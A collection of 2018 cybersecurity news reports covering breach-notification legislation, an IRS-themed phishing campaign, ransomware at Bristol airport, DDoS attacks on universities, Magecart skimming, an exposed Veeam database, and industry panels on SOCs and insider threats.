A bill to standardized the data security and breach notification process for financial institutions has been approved by the House Financial Services Committee, despite pleas not to undermine the power of state regulators.
On September 13, 2018, the committee voted 32-20 to approve the amended Gramm-Leach-Bliley Act (GLBA), now the Consumer Information Notification Requirement Act (H.R. 6743). The existing breach notification standards have been systematically amended to require that all financial institutions notify consumers of a data breach, according to Big Law Business.
The vote to approve comes on the heels of members of the committee receiving a letter from the American Bankers Association, Consumer Bankers Association, Credit Union National Association, Independent Community Bankers of America and the National Association of Federally-Insured Credit Unions.
Writing on behalf of their members, the collective group advocated for Congress to move forward with enacting data breach notification legislation, specifically supporting “a flexible, scalable data protection standard equivalent to what is already in place for financial institutions under the GLBA.”
“Our existing payments system serves hundreds of millions of consumers, retailers, financial institutions and the economy well. Protecting this system is a shared responsibility of all parties involved and we must work together and invest the necessary resources to combat never-ending threats to the payments system,” the letter said.
Yet state regulators oppose the bill. “This bill would preempt state data breach notification laws and undermine state authority, limiting states’ ability to protect its residents and oversee state-chartered and state-licensed financial services providers,” wrote the Conference of State Bank Supervisors (CSBS).
While organizations may disagree over who should have the authority to legislate data breach notifications, the financial sector continues to be the target of cyber-attacks. According to a recent report from ThreatMetrix, 81 million cybercrime attacks occurred across financial institutions during the first half of 2018. The Digital Identity Network study found that of those attacks, 27 million were targeting the mobile channel in light of mobile banking adoption.
According to a September 12 press release from ThreatMetrix, “Financial services mobile transactions are growing globally, with China, South East Asia and India showing the strongest regional growth. Overall, the biggest threat in financial services comes from device spoofing, as fraudsters attempt to trick banks into thinking multiple fraudulent log-in attempts are coming from new customer devices, perhaps by repeatedly wiping cookies or using virtual machines.”
While the fall might seem like a peculiar time to receive emails from the Internal Revenue Service (IRS), researchers at Fortinet have discovered a phishing campaign claiming to be from the IRS but reportedly sent from a server originating in Italy.
The campaign appears to be targeting nonresident aliens, as the fraudulent email is titled “2018 UPDATE: NON RESIDENT ALIEN TAX WITHHOLDING.” The FortiGuard SE team suspects that the intended targets are those who requested a six-month extension on filing their income taxes back in April.
Below is an image of the highly sophisticated and convincing email from the phisher.
“The formal language and basic template (full of lengthy descriptives, no graphics, and no links) mimics a document issued by a government agency, and the form labeled 'W-8BEN Form.PDF' masquerades as an official W-8BEN document from the IRS, which according to Wikipedia is a document used by foreign persons (including corporations) to certify their non-U.S. status,” researchers wrote.
While at first glance, the email seems legitimate, there are grammatical issues and spelling errors that should give readers pause. Unfortunately, because the targets of this campaign are nonresident aliens, English may not be their native tongue, making the less-obvious errors in this message – such as the incorrect name of the agency, Department of the Treasury – difficult to spot, even for U.S. citizens.
Researchers did find that the attached PDF file is free of any embedded executables but noted that the IRS has never sent any official documents via email. Because the attached form contains random spaces and miscellaneous punctuation marks, researchers believe that the PDF was scanned and manipulated.
“While this document states that its last revision was February 2018, the look and feel is not that of a digital document (specifically those found on IRS.gov). Finally, the fonts are mismatched on the form, especially the “FAX TO: 1 877 917 3730” direction at the bottom, which is colored in blue and is in a different font style and size. This is another dead giveaway for this poorly crafted campaign,” researchers wrote.
North Korea has hit back at a landmark US indictment of an alleged cyber operative earlier this month, branding it a “smear campaign” and the individual concerned a “non-entity.”
In a typically bellicose response to the US charges, a statement from Pyongyang’s foreign ministry on Friday claimed they amounted to little more than “vicious slander.”
“The act of cyber-crimes mentioned by the Justice Department has nothing to do with us. The US should seriously ponder over the negative consequences of circulating falsehoods and inciting antagonism against the DPRK that may affect the implementation of the joint statement adopted at the DPRK-US summit,” it reportedly noted.
“The US is totally mistaken if it seeks to gain anything from us through preposterous falsehoods and high-handedness.”
US investigators believe that Park Jin Hyok is a member of the infamous state-backed Lazarus Group responsible for WannaCry, and devastating attacks on Sony Pictures Entertainment, Bangladesh Bank and many more.
The indictment, filed on June 8 and made public at the start of the month, alleges he worked for a government front company known as Chosun Expo Joint Venture, or Korea Expo Joint Venture (KEJV), which operated out of Dalian, China.
The DoJ claimed Park and unnamed co-conspirators were given away via social media and email accounts used to send spear-phishing emails, their online aliases, accounts used to store stolen credentials, malware code libraries, proxy services and IP addresses linked to the attacks.
Park is charged with two counts of conspiracy to commit computer and wire fraud, but according to Pyongyang he is a “non-entity” — which could be interpreted to mean he doesn’t exist, or that he is a person of no importance.
A similar line was used by the Russian government in response to overwhelmingly incriminating UK intelligence and CCTV evidence of two men alleged to be responsible for attempting to assassinate a former Kremlin military man in Salisbury. The two men involved were paraded on Russian TV last week as innocent tourists.
Normal service was finally resumed at Bristol airport yesterday after two days of ransomware-related outages caused a blackout of flight information screens.
Staff were forced to hand-write regular updates on whiteboards to provide passengers with crucial information on flight arrival and departure details, while additional airport staff were deployed to help answer questions from anxious travelers.
A post on the airport’s official Twitter feed on Friday had the following:
“We are currently experiencing technical problems with our flight information screens. Flights are unaffected and details of check-in desks, boarding gates, and arrival/departure times will be made over the public address system. Additional staff are on hand to assist passengers.”
It urged passengers to arrive early “and allow extra time for check-in and boarding processes.”
Flight information was finally restored in arrivals and departures on Sunday.
Airport spokesman, James Gore, told the BBC that it had been hit by a “speculative” ransomware attack.
“We believe there was an online attempt to target part of our administrative systems and that required us to take a number of applications offline as a precautionary measure, including the one that provides our data for flight information screens,” he said.
"That was done to contain the problem and avoid any further impact on more critical systems.”
The airport had not paid the ransom, Gore added.
The incident is another reminder of the continuing threat posed to organizations by ransomware, even at a time when the general trend appears to be of cyber-criminals favoring easier and more lucrative ways to make money, like crypto-jacking and BEC attacks.
A midyear report from Trend Micro recently claimed that ransomware detections grew just 3% from the second half of 2017 to the first six months of 2018, while the number of new ransomware families detected dropped 25%.
In contrast, the number of cryptocurrency mining detections jumped 141% over the same period.
The UK’s universities and colleges are facing a growing threat from DDoS attacks, with reports suggesting that students may be to blame for many of them.
They reveal that while 64 higher education partners were targeted by 276 DDoS attacks in 2016/17, 82 members were hit by 386 attacks in 2017/18. The figure for further education (colleges) jumped from 75 members and 302 attacks to 107 members and 475 attacks over the same time period.
“DDoS attacks are designed to disrupt or bring down a network. If connectivity to the network is lost for any length of time, it can be catastrophic for any organization, both financially and reputationally,” a Jisc statement noted.
“Students might, through no fault of their own, miss the deadline for handing in assignments online, and teaching would resort to ‘chalk and talk.’ Fortunately, attacks that cause this much damage are rare, and we encourage our members to be robust in their approach to cybersecurity.”
Last week, Edinburgh university became the latest big name to fall victim to a DDoS outage after its main website was down for over a day.
The head of Jisc’s security operations centre, John Chapman, told the BBC that many of the attacks may be the result of student activity, rather than cybercrime groups.
It noted how one four-day attack was traced back to a hall of residence — the result of one gamer trying to take another out of action.
Attacks are also concentrated during working hours in term time and tail off significantly during the holidays, although any DDoS-ers would probably focus their efforts when they're most likely to affect the victim organization.
"There is evidence... to suggest that students and staff may well be responsible for many of the DDoS attacks we see," Chapman reportedly claimed.
A new survey by Jisc found that universities and colleges rank lack of awareness and accidental breaches as their number one cybersecurity risk followed by ransomware/malware, and then phishing and social engineering, external attacks and DDoS in fifth place.
Microsoft Office documents accounted for the delivery of nearly half of all malicious macros in August 2018, according to Cofense.
A recent blog post found that the macro remains the email attachment of choice for delivering malicious payloads. Of all the mechanisms analyzed, 45% of attackers used these documents to delivery malicious macros, including Geodo, Chanitor, AZORult and GandCrab.
According to researchers, the macro is a top choice because it either is enabled on a machine or only requires a single mouse click to be enabled. “This makes it almost trivial to launch the first stage of an infection chain,” Cofense wrote.
It is often the case that the Microsoft Office macro feature is enabled by default, leaving users completely unaware that there were any problems with opening the document. Yet researchers noted that even with appropriate protections in place, users only see a warning that can be dismissed with one click.
“Abuse of this feature can be easily mitigated by disabling macros enterprise-wide. However, macros do have legitimate and valuable usage, upon which many businesses rely. To help reduce the attack surface introduced by this feature, businesses have some option,” Cofense wrote. While a blanket policy of blocking documents at the gateway is the most effective solution, these strict policies can hinder user productivity.
Defending against phishing attacks is further complicated by social engineering tactics. Additional findings from a FireEye study, which revealed that one in every one hundred emails represent a phishing or malicious email. Of those attempted email attacks, 90% are malware-less. The goal with malware-less attacks is to trick the user into sharing information about the company by impersonating a trusted source.
“Phishing has been around since the mid-to-late ’90s, and yet it’s still a significant problem as a direct effect of how successful it remains, even decades later. People are, and always will be, the weakest link,” said Thomas Pore, director of IT and services for Plixer.
“Social engineering will succeed, which means your organization is vulnerable. You must constantly monitor network traffic and digital communication to look for behavior anomalies. Operating the SOC under the assumption that you’ve already been infected puts you in a state of mind to stay diligent when network traffic behavior anomalies rise up. A combination of regular staff training, critical-asset tagging, patching and behavior anomaly detection is the foundation of a strong and successful security program.”
In response to reports that the US State Department is lagging in its implementation of basic cybersecurity standards, a group of bipartisan senators have written a letter to Secretary of State Mike Pompeo urging him to augment security mechanisms and improve compliance.
The senators point out that the password-only approach is not reliable protection, particularly with the increased number of phishing attacks. Additionally, they referenced the 2018 General Service Administration assessment, which evidenced that across the Department of State only 11% of agency devices had enhanced security controls deployed.
“The US government, through NIST [National Institute of Standards and Technology], has done a great job of providing best-practice guidance to enterprise via the Cybersecurity Framework and other documents,” said Anupam Sahai, vice president of product management at Cavirin.
“However, it is sad that they are not as widely adopted across the different agencies. Is this any different from Congress being unable to come to agreement on securing voting machines in advance of the November elections, knowing the published risks?”
Senators Ron Wyden, Ed Markey, Jeanne Shaheen, Cory Gerdner and Rand Paul wrote, “We are sure you will agree on the need to protect American diplomacy from cyber attacks, which is why we have such a hard time understanding why the Department of State has not followed the lead of many other agencies and complied with federal law requiring agency use of MFA [multifactor authentication].”
“You would expect anyone handling sensitive data today to have enabled multifactor authentication as one of their basic security protocols,” said Steve Durbin, managing director of the Information Security Forum.
“It’s imperative that all types of organizations ensure they have strong standard security measures in place. This requires more diligence and organization-wide discipline than throwing money at the latest hyped-up software solution.”
The letter requested that Secretary Pompeo respond with details to three questions by October 12, 2018. Among other things, lawmakers want to know what actions the Department of State has taken to implement MFA, specifically for accounts with elevated privileges. In addition, they have requested statistics with details on the number of attempted and successful attacks on the Department of State systems located abroad for each of the past three years.
The company issued its first biannual state of cloud native security report in which researchers analyzed deployments of common cloud-native applications and ran honeypots to collect data on risk factors and attack patterns against cloud native services.
Researchers focused on two main sampling methods, which involved scanning the internet internally and discovering openly accessible servers using public scanning services. From that list of commonly used applications, they then scanned the banners to identify different versions and vulnerabilities.
The second sampling method used honeypots to mimic the behaviors of popular cloud-native applications to detect patterns of attacks on open servers. “The team found a disturbing number of out-of-date applications, with many open to known vulnerabilities (with CVEs). Some of these were vulnerabilities that were disclosed years ago. Additionally, the team found a great number of active bots/attackers that search for these applications in an attempt to exploit them,” the report said.
What researchers discovered was that 60% of cloud-native services are not automatically patched to the latest version. Additionally, over 90% of attacks are automatically executed against outdated code and known CVEs.
In their survey of the top cloud-native applications, researchers discovered that 25% were running with CVEs where a known exploit existed. The application most likely to be outdated was MySQL, with more than 80% of deployments at least one version behind. More than 60% of these cloud-native application attacks originated from Chinese IPs.
“Adoption of cloud-native technologies gives organizations a chance to build and deploy software faster and scale and manage deployments with ease. But this speed and agility is often coming at the expense of foundational security practices,” said Dima Stopel, Twistlock co-founder and VP of research and development, in a press release.
“Organizations need to build automatic enforcement of security into their application pipelines...to prevent vulnerable code from reaching production but also to quickly triage and patch new risks in production.”
Let’s change the way we talk about security, as global news and incidents are creating new threats.
Speaking at 44CON exploring how “Bad analogies make bad realities,” Charl Van Der Walt, strategic director at Sensepost, said that “while we were talking about hacking sex toys, Russian hackers changed the world quite substantially” and began “a new era in on our industry.”
He said that this changed the cybersecurity industry significantly, and as attackers upped their game “our world is different to what we knew before, a threat is emerging that has potential to change the world.”
He told the audience that as the world is “going to change in significant ways, then you’re a part of that battle and at the front of a war that shapes our world in a substantial way,” and we can shape it in the decisions we make, and it is “up to us to determine how to change.”
Using a series of analogies including the 2008 financial crisis and the Doomsday clock, van der Walt argued that it was time to develop the “why” of security and “why it matters” if it is done right, and how we need to explain why security is important in a way others can understand.
“Metaphors matter, and changes the way we think,” he said. “Compare severity and likelihood, and express where the Doomsday Clock is in terms of the security concept. The problem is risk is thumb sucking; estimating concepts with no way to quantify them.”
Speaking on debt management, van der Walt recommended creating and maintaining a debt register, and deciding who is best positioned to determine the right thing to do, and think at the right level of security.
“Every time a security trade-off is made, get the recommended cost and what the actual cost is and deduct one from the other and get the debt. Dial it up or down depending on the severity of issue, and once you have the register you communicate it to the board for them to consider.”
He concluded by saying that we see breaches all of the time, and it is easy to look at each in isolation, but collectively these can be a problem for everyone. “We are facing real threats and that is where the fundamentals of the world can be changed,” he said. “If we address the ways we talk and analogies we use.”
News has emerged of yet another Magecart victim following a major breach affecting British Airways: this time a push notification service provider known as Feedify has been repeatedly targeted.
However, RiskIQ threat researcher, Yonathan Klijnsma, explained that Feedify had actually been “affected” by Magecart since August 17. Despite the firm remediating the issue, it appeared that the hackers re-inserted it soon after.
Security researcher Kevin Beaumont warned e-commerce firms to remove Feedify.
Feedify is the latest in a long line of Magecart victims. However, contrary to previous reports, Klijnsma explained that the attacks aren’t tied to a specific group but a number of separate entities all using the same code.
This explains why some attacks go for a supply chain provider, such as Feedify or Ticketmaster partner Inbenta Technologies, while others have targeted the e-commerce site directly, like the sophisticated BA attack.
Another victim of the group over recent weeks is fashion and home décor provider Groopdealz, according to Klijnsma. He revealed this week that the firm’s site was infected with the Magecart skimmer on August 5.
Magecart has been tracked since 2016: it’s code that operates on a website a bit like a card skimmer in that it detects and then steals card data as it is entered into an e-commerce site. Unlike in most traditional breaches where the attackers go after card databases, the CVV numbers can also be hoovered up via this skimming technique, making the stolen data more easily monetizable.
The ICO has received 500 calls each week to its breach reporting helpline since the GDPR came into force in May, but around a third of these don’t meet the minimum threshold, according to the deputy commissioner of operations.
James Dipple-Johnstone told the CBI Cyber Conference in London this week that the UK privacy watchdog had been inundated as anxious firms over-report.
In the privacy watchdog’s first update since the new data protection regime came into force, he also revealed that many organizations are “struggling with the concept” of 72-hour breach notifications, interpreting it incorrectly as 72 “working hours.”
Dipple-Johnstone urged organizations to get their incident response plans in place and ensure senior employees are ready to provide as much detail as possible from the start, adding that some breach reports are incomplete.
“It is not very helpful to be told there is a breach affecting lots of customers but the reporter isn’t authorized by the general counsel to tell us more than that,” he argued. “If you don’t assign adequate resources to managing the breach we may ask you why not.”
He urged organizations to check the ICO’s reporting guidelines, and to ensure they have multi-layered security in place, including elements such as two-factor authentication, email filters and anti-spoofing controls, and enhanced staff training and awareness.
Lillian Tsang, senior data protection and privacy consultant at the Falanx Group, argued companies are over-reporting to be on the safe side.
“It is the assessment, ‘whether a breach poses a fundamental risk to people’s right and freedom’ which makes a breach reportable — this part is the difficult/uncertain element that a company faces,” she explained.
“A company would have to come down to a decision and it would be their decision alone, so it can become a matter of subjectivity: a case of ‘do we or don’t we?’ Companies don’t want to play a guessing game because they would rather report a breach, to avoid fines of non-reporting than potentially face the financial and reputational consequences.”
To mitigate these challenges, companies need a clear breach reporting procedure outlining which types of incident are worth reporting and which aren’t, she advised.
“This will help them make a decision within the allotted 72-hour time period. It is also important that these criteria are shared and adopted throughout the whole organization by training staff and creating greater awareness,” said Tsang.
“Understanding the products and services where potential risks of a fundamental breach might occur is also vital by using tools, such as privacy by design and data protection impact assessments, continuously throughout the whole product life cycle. Finally, they companies need to look at and understand guidance from the regulator and the European Commission.”
Board members need to improve their understanding of cybersecurity to better manage business risk, the head of the National Cyber Security Centre (NCSC) has argued.
Speaking at the CBI Cyber Conference in London this week, Ciaran Martin claimed that senior business leaders are laboring under three dangerous misapprehensions, that cybersecurity is: too complex so they won’t understand it, too sophisticated so they can’t do anything to stop it and targeted, so they’re not at risk.
Yet board members can’t manage risk they don’t understand, so they must become more cyber-literate, he said.
“No-one in government is asking you to make cybersecurity your top priority. Your core business is your top priority,” said Martin.
“We do expect you, however, to be good enough at cybersecurity to take care of the things you care about. And that means you have to understand what they are, and what you can do to protect yourselves. This means you need to be – at least a little bit – cyber-literate.”
Martin admitted that the government’s strategy on providing businesses with cybersecurity advice and best practice hasn’t worked out as expected, with organizations focusing on good governance and simply outsourcing expertise.
“If you look at some of the previous guidance it simply says — cybersecurity should be discussed at board level. It doesn’t say how, and that a plan should be in place. That’s what we are moving on from today,” said Martin.
“So, over the past few months, we have been talking to businesses to work out where the gaps in their cybersecurity knowledge lie. And over the next few months we will be rolling out a suite of guidance on cybersecurity for large corporate organizations.”
During the speech, Martin posed five basic questions board members should be asking of their technical teams.
These cover: how the organization deals with phishing, privileged IT accounts, software and device patching, supply chain security and authentication.
“Crucially, we are also telling you what to look for in the response,” he added.
“If the answer is: ‘We have hired X and bought Y to address the problem,’ ask the question again. You need to understand what is actually happening — not what activity has been bought.”
Speaking at the Spotlight18 conference in Las Vegas today, Deloitte experts weighed in on how to build an insider threat program during a round table discussion. Participating in the keynote discussion were Linda Walsh, managing director, Cyber Risk Services; Peter Hodge, senior manager, Cyber Risk Services; and Naj Adib, senior manger, cybersecurity advisor.
The success of Deloitte’s user entity and behavior analytics (UEBA) projects stems directly from the fact that they are built within the framework of an overarching risk-program approach, and the Deloitte team said its three key pillars of a successful insider threat program include people, process and technology.
“Scaring people doesn’t work well,” said Walsh, who spent 21 years working on insider threats for the FBI. A common problem that Walsh has seen throughout her career is with system admins who leave access open to be able to perform tasks or with admins who have turned into disgruntled employees and maliciously leave access open in order to steal user credentials. “That type of problem, that lateral movement is a hard thing to solve for,” she said.
Developing an insider threat program requires that organizations first define who and what insider threats actually are. “There are not a lot of organizations that have not defined what insider threat means to them. Insiders can be current employees, privileged IT users/admins, contractors/service providers, customers/clients, and their behaviors can be malevolent or unintentional,” said Adib. "Defining insiders and understanding the motivational factors of their behaviors is foundational to building your program."
Because all organizations are different, insider threat programs will vary from company to company, but regardless of size or risk, every organization should develop an insider threat working group. A working group is the first step and a key answer to the often-asked question of how to get mobilized.
Running simulation attacks, such as a Phishme (now Cofense) campaign, can be enlightening. “Now they get it,” said Walsh, “and it oftentimes works so well that they are not opening things they should. That’s the type of awareness you can start. Those are your quick wins.”
The key guiding principles of building a successful insider threat program are that it must be holistic, coordinated, proactive and risk based. “It’s about setting the right policies and standards so that users understand the expectations. We don’t want to go out and have policies and standards that are shelf-ware. Security awareness training within organizations is out there, so add in concepts of what constitutes an insider. Train people to become your frontline,” Abid said.
The goal is to reduce the number of false positives, which comes back to the insider threat working group, said Walsh. "Once you've found all the meaningful data and you can correlate it – which is a challenge that takes a lot of work – you can start prioritizing to reduce false positives to come out with some meaningful, actionable data. A lot of people are hesitant to start turning out that data because there is so much noise, but ignorance is not a security strategy anymore."
Though Bomgar was itself acquired by Francisco Partners earlier this year, the company has announced today that it will acquire Phoenix, Arizona, based BeyondTrust, a privilege-centric security company. The joint company will operate under the BeyondTrust name, though the company will be headquartered in Bomgar's Atlanta office.
No specific terms of the acquisition were disclosed, but the deal is expected to close in October. “I’m confident that the additional investment and scale resulting from this combination will drive innovation for our customers and new opportunities for our partners as we expand our leadership position in the fast-moving Privileged Access Management market,” said Kevin Hickey, president and CEO of BeyondTrust, in today’s press release.
With the goal of moving its mission to help customers better defend against cyber-attacks forward, Bomgar has signed the agreement securing BeyondTrust’s extensive privileged access management (PAM) platform.
“We are extremely excited to build upon BeyondTrust’s Privileged Access Management leadership and the significant benefits it will bring to our joint customers, partners and people,” said Matt Dircks, CEO of Bomgar, who will lead the merged company as CEO.
“Both organizations bring talented employees who are passionate about protecting organizations from attacks related to privilege access. The greater scale and resources of the combined company will allow us to accelerate innovation and deliver technology that protects our customers from constantly evolving threats.”
As threats continue to evolve across endpoints, servers, internet of things, cloud and network device environments, the marriage of Bomgar’s security offerings and the BeyondTrust PAM portfolio – currently used by more than 19,000 customers worldwide – will enhance privileged credentials, remote access sessions and endpoint protections.
“Both Bomgar and BeyondTrust have a long history of driving innovation and efficiency and delivering solutions, services and support that customers love,” said Francisco Partners’ co-founder and CEO Dipanjan “DJ” Deb.
“Privileged Access Management is one of the top priorities for today’s security leaders, and we see incredible opportunity with the combination of Bomgar’s and BeyondTrust’s technology and talent,” said Brian Decker, partner and head of security investing at Francisco Partners.
“The joint team is focused on developing integrated and usable products, building an even stronger channel and continuing to deliver the highest levels of customer service and support.”
A key part of the UK’s mass surveillance regime has been ruled illegal by a European court.
The European Court of Human Rights ruled that bulk interception of communications data and the obtaining of data from comms service providers violated Article 8 of the European Convention on Human Rights: the right to respect for private and family life/communications.
They also contravened Article 10 in that there were “insufficient safeguards in respect of confidential journalistic material.”
However, there are some rather large caveats to the judgement.
The court found that bulk interception doesn’t “in and of itself” violate human rights, just that the government didn’t have enough independent oversight in place to monitor “interception and the filtering, search and selection of intercepted communications for examination, and the safeguards governing the selection of ‘related communications data’.”
The court also found that sharing intelligence with foreign governments — as GCHQ has done with the NSA for years — did not violate the law.
Finally, this judgement only applies to the previous regime and not the new Investigatory Powers Act — although the latter is seen by many as even more controversial.
Also known as the 'Snoopers’ Charter' this surveillance legislation has already seen a major setback when in April the High Court told ministers to redraft the section requiring communications providers to retain phone records, location data, internet browsing history and info on everyone a user emails and texts for a year.
Although the judges again said that the bulk collection in itself wasn’t illegal, they ruled that the fact police, regulators and other bodies can then access this info without independent authorization and for reasons unrelated to investigating terrorism or serious crime, most definitely is.
The latest European court case was brought by Big Brother Watch, Amnesty and other human rights groups after revelations by Edward Snowden in 2013 on the mass collection of data on citizens, even if they are not suspected of a crime.
Data management firm Veeam has been left red-faced after a misconfigured MongoDB server was allowed to publicly expose 445 million records, including prospective customer names and email addresses.
Independent researcher Bob Diachenko claimed to have discovered the Amazon-hosted IP address, which was indexed on August 31, on September 5. Found via a simple Shodan search, it was left exposed without a password until September 9.
The 200GB trove appears to have been used by the company’s marketing automation team and included hundreds of millions of records collected from 2013 to 2017.
Publicly exposed data included customers’ first and last names, email addresses and recipient type (end-customer or partner), country, organization size and more, according to Diachenko.
“Even taking into account the non-sensitivity of data, the public availability of such large, structured and targeted dataset online could become a real treasure chest for spammers and phishers. It is also a big luck that database was not hit by a new wave of ransomware attacks which have been specifically targeting MongoDBs (with much more extortion amount demand than it was last year),” he commented.
“As I have already reported, issues with MongoDB have been known since at least March of 2013 and have been widely reported since. The company has updated its software with secure defaults and has released security guidelines. It's been five years now and these unsecured databases are still widely available on the internet.”
The news will be rather embarrassing for a firm which sells back-up and “intelligent data management” solutions to help firms “move securely across multi-cloud infrastructures.”
However, it seems to have acted pretty quickly to secure the server once notified by reporters.
A statement from the company claimed that the records were “non-sensitive” prospect emails, although that would still theoretically be enough to launch phishing attacks at the individuals.
“We have now ensured that all Veeam databases are secure,” it added. “Veeam takes data privacy and security very seriously, and a full investigation is currently underway."
The website of Edinburgh University was still down at the time of writing after the institution suffered a major cyber-attack during its Freshers' Week.
A university spokesman told the Edinburgh Evening News that it has “rigid measures in place” to protect IT systems and data.
“Our defenses reacted quickly and no data has been compromised,” he added. “We will continue to work with our internet service provider, [national cybercrime investigators] and with other universities to prevent these network attacks in future.”
The main ed.ac.uk site was still down on Thursday morning, nearly 24 hours after the first reports of an attack went online. That would indicate a serious DDoS attack.
Jisc, the UK non-profit which runs the super-fast Janet network for research and educational institutions, released a statement claiming that a "number of universities" have been targeted this week and adding that the number of DDoS attacks on them "typically increases at this time of year, when students are enrolling at, or returning to university."
"While Jisc is responsible for protecting connections to the Janet Network for its members (colleges, universities and research centres), members are responsible for protecting their own cyberspace," it added. "However, Jisc also provides DDoS threat intelligence to its community and provides advice to members affected by cyber-attacks on how to deal with the problem and minimize the impact."
Ironically, Edinburgh University was praised by the government this year for carrying out cutting-edge cybersecurity research. It is one of 14 Academic Centres of Excellence in Cyber Security Research, backed by the £1.9bn National Cyber Security Strategy.
DDoS attacks grew by 40% year-on-year in the first six months of 2018, according to new figures from Corero Networks.
The security firm claimed that attacks are becoming shorter — with 82% lasting less than 10 minutes — and smaller, with 94% under 5Gbps. However, one in five victims are hit with another attack within 24 hours, the report revealed.
The research looked at the same period last year and found that the maximum attack size quadrupled to 359Gbps. Evaluating thousands of worldwide DDoS attacks, researchers reportedly gathered real-time attack data from botnet scanning, honeypots, ISPs and traffic moving between attackers and their targets. Data analysis led researchers to attribute the stark surge to IoT botnets and Satori malware exploits, one of many variants of the Mirai malware.
“Due to the increase in IoT-related malware exploits and the rampant growth of large-scale DDoS attacks, research conclusions point to the continued use of IoT botnets. Cyber-attacks hit the 2018 FIFA World Cup, as well as cryptocurrency-related businesses, maximizing revenue loss,” Nexusguard wrote in a press release. Additionally, attacks on the Verge Network (XVG) resulted in a significant loss of 35 million XVG tokens.
“The biggest zero-day risks can stem from various types of home routers, which attackers can exploit to create expansive DDoS attacks against networks and mission-critical services, resulting in jumbo-sized attacks intended to cripple targets during peak revenue-generating hours,” said Juniman Kasman, chief technology officer for Nexusguard.
“Telcos and other communications service providers will need to take extra precautions to guard bandwidth against these super-sized attacks to ensure customer service and operations continue uninterrupted.”
Nexusguard analysts advise communications service providers (CSPs) and other potentially vulnerable operations to augment their preparedness so that they are able to maintain their bandwidth, especially if they lack full redundancy and failover plans in their infrastructures. CSPs and vulnerable organizations that enhance bandwidth protection will be better positioned to stay ahead of the surging attack sizes.
“In the quarter, increasingly large attacks (a YoY average-size increase of 543.17%) had a severe impact on Communication Service Providers (CSP)," the report said. "Serving as a link between attack sources and victim servers and infrastructures, CSPs bear the burden of the increasing size of traffic, irrespective of its source or destination. As such, Internet service is degraded.”
Whether it’s hiring new staff or up-leveling internal staff, companies have had to get creative in order to deal with the real challenges of the skills gap. In talking about what security leaders are doing to focus on people and training them, Steve Moore, chief security strategist at Exabeam, talked with industry experts at Spotlight18 in Las Vegas to understand the creative ways that they have answered talent shortage.
One solution is, "Red team/blue team exercise and testing internally to make sure we are keeping staff on their toes,” said Ray Johnston, CISO at Inspire Brands. While internal efforts to keep current team members abreast of the newest threats are fruitful, it’s also important to build relationships outside of the organization.
“We have established relationships with Army cyber defense and National Guard cyber defense units, and we’ve been able to pull from that resource pool,” Johnston said. Companies can tap into a wide pool of candidates that includes highly skilled people coming off of active duty.
“Also, we have been establishing relationships with local universities,” Johnston said. Partnering not only with local universities but existing partners can also open doors of opportunity. Many existing partners are also confronting staffing issues, so potential success can depend a lot on partners, which is why part of the solution is growing people from inside with mentors and interns. Then there are organizations such as CyberPatriot that enable experts to mentor younger students and introduce them to the career opportunities available in cybersecurity.
Training is one area where many organizations fall behind, and Moore emphasized the importance of making sure the people in the SOC even know what they are protecting in terms of the business they are dealing with, the key risks and where the jewels are.
Given that IT as a whole and security in particular are challenged with constrained staffing and budgetary resources, “The single best advice, is to make sure that your strategy for the SOC is aligned with risk,” said Andrew Wild, CISO at QTS. “Look at the limited resources you have, and make sure those align with the risks you think your organization is facing so that you can explain how they have been appropriately allocated.”
Another creative measure companies can take is to invest in new technologies that allow for security capabilities to be put into the hands of less-skilled people across the organization. “We have human resources departments that have started using Exabeam themselves. Even though they have never used a security technology, they can monitor user activity. This is really useful, especially if they know they are soon going to go through a reduction in force,” said Tony Kolish, EVP customer success at Exabeam.
“Monitoring user behavior then flags any anomalies so that other departments – such as HR and legal – can detect if something odd is happening. Then they can push that forward to the security team as something worth investigating.”
Having had the experience of building a SOC in the middle of a crisis in his former post, Steve Moore, chief security strategist at Exabeam, understands the need for security and security operations to be relevant. Leading a panel discussion on "Building a Modern SOC" at this year’s Spotlight18 conference in Las Vegas, Moore questioned why – given that so many organizations now have a SOC – attackers continue to be successful.
In order to answer that question, panelists first discussed what indicators of success or failure they look for in a SOC.
Panel participant Andrew Wild, CISO at QTS, went straight to metrics. “One key for me is looking at whether you have the right people and asking whether the metrics are good. Are the metrics reliable enough to evaluate your ongoing performance?” Looking at how they are measuring and how they can improve are indicators that offer value when thinking about SOC transformation.
While metrics do have value, Ray Johnston, CISO at Inspire Brands, said one key indicator for him is looking at whether they have the right people. “How are you keeping them current? Do they have the right skill sets? We underinvest in people, and let them sit and stagnate. At the end of the day, it’s people, process and technology. People can screw up that process.
“Most often, conversations about the SOC include the issue of signal-to-noise ratio. SOCs lack contextualization, the time they need to build the story and the right resources to make decisions in a rapid fashion. We have to get better at moving the advanced threat actors into spaces where we can pick them up quicker.”
In addition to the people, there are also technical blockers, like patching, which is always an issue. Viewed by some as the easiest thing to do, panelists agree that many people do patching quite poorly, with few people understanding whether patching is even managed and maintained right or if the patches are even working properly.
“Patching is important, but what are you patching?” said Wild. “You can’t patch everything. It’s just not possible. Are they patching those software components with known exploits that are commonly used? We need to be bringing a risk-based approach into the SOC to focus on the known threats that are most likely to cause issues.”
A risk-based approach includes physical security but also knowing what and where the crown jewels are. “It’s not just in the security space but in the space around security. If you are not aware of where the consumer or business trends are taking the business, you will fail,” Wild said.